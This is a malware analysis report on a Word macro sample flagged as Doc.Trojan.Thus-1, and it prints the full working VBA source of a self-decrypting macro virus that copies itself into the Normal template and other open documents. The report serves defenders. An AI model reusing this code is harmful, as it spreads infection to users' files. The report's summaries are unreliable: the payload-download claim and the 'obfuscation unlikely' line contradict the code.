Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df8e7bcf4d83d228…

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-01-05 12:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f2deecd78281cad2e59598a77d60cc66 SHA-1: 9f363c2be600d09dd568676bb2bfac495b64db70 SHA-256: df8e7bcf4d83d228c6e512668a0c0c52d82f82628896daececbc99fea5f966b6
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to decrypt and modify its own code, suggesting it is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Thus-1' further supports its malicious nature. The specific family is unknown due to the obfuscation and lack of network indicators.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13716 bytes
SHA-256: 844a11fd7dce0e14997cee8d8beab656456e02754adf0dcf77820ba570111a86
Detection
ClamAV: Doc.Trojan.Thus-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Alina_001'
Dim s, a As Integer, n, ch
On Error Resume Next
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Alina_001'" Then
For i = 60 To 87
    s = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    For n = 1 To Len(s)
        ch = Mid(s, n, 1)
        a = Asc(ch)
        Mid(s, n, 1) = Chr(a Xor 7)
    Next n
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
Next i
Else
For i = 60 To 87
    s = VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    For n = 1 To Len(s)
        ch = Mid(s, n, 1)
        a = Asc(ch)
        Mid(s, n, 1) = Chr(a Xor 7)
    Next n
    VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
    VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
Next i
End If
qqq
For k = 1 To Application.Documents.Count
If Mid(Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(60, 1), 1, 1) <> "'" Then
   For i = 60 To 87
       s = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
       For n = 1 To Len(s)
           ch = Mid(s, n, 1)
           a = Asc(ch)
           Mid(s, n, 1) = Chr(a Xor 7)
       Next n
       Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
       Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
   Next i
End If
Next k
If Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(60, 1), 1, 1) <> "'" Then
   For i = 60 To 87
       s = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
       For n = 1 To Len(s)
           ch = Mid(s, n, 1)
           a = Asc(ch)
           Mid(s, n, 1) = Chr(a Xor 7)
       Next n
       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines i
       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, s
   Next i
End If
End Sub
Private Sub Document_Close()
  Document_Open
End Sub
Private Sub qqq()
''''Hi'Buuhu'Ubtrjb'Ib s
''''Fwwkndfsnhi)Hwsnhit)QnurtWuhsbdsnhi':'Afktb
''''Na'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)Knibt/5+'6.';9'% FknifX776 %'Sobi
''''IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb'X
'''')CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)DhrisHaKnibt
''''Bic'Na
''''Na'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt':'7'Sobi
''''IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb'X
'''')NitbusKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)Knibt/6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist'X
'''')Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt.
''''Bic'Na
''''Na'IhujfkSbjwkfsb)Tfqbc':'Afktb'Sobi'IhujfkSbjwkfsb)Tfqb
''''Ahu'l':'6'Sh'Fwwkndfsnhi)Chdrjbist)Dhris
''''Na'Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)Knibt/5+'6.';9'% FknifX776 %'Sobi
''''Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)CbkbsbKnibt'6+'Fwwkndfsnhi)Chdrjbist)Nsbj/l.'X
'''')QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
''''Bic'Na
''''Na'Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt':'7'Sobi
''''Fwwkndfsnhi)Chdrjbist)Nsbj/l.)QEWuhmbds)QEDhjwhibist)Nsbj/6.'X
'''')DhcbJhcrkb)NitbusKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist'X
'''')Nsbj/6.)DhcbJhcrkb)Knibt/6+'IhujfkSbjwkfsb)QEWuhmbds'X
'''')QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt.
''''Bic'Na
''''Ib s'l
'' Fknif+'~hr'f'ebfrsnarkbts'`nuk)'N'khqb'~hr)))
End Sub




























' Processing file: /opt/analyzer/scan_staging/56e29660490f4cb691359c72583d4112.bin
' ==========
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.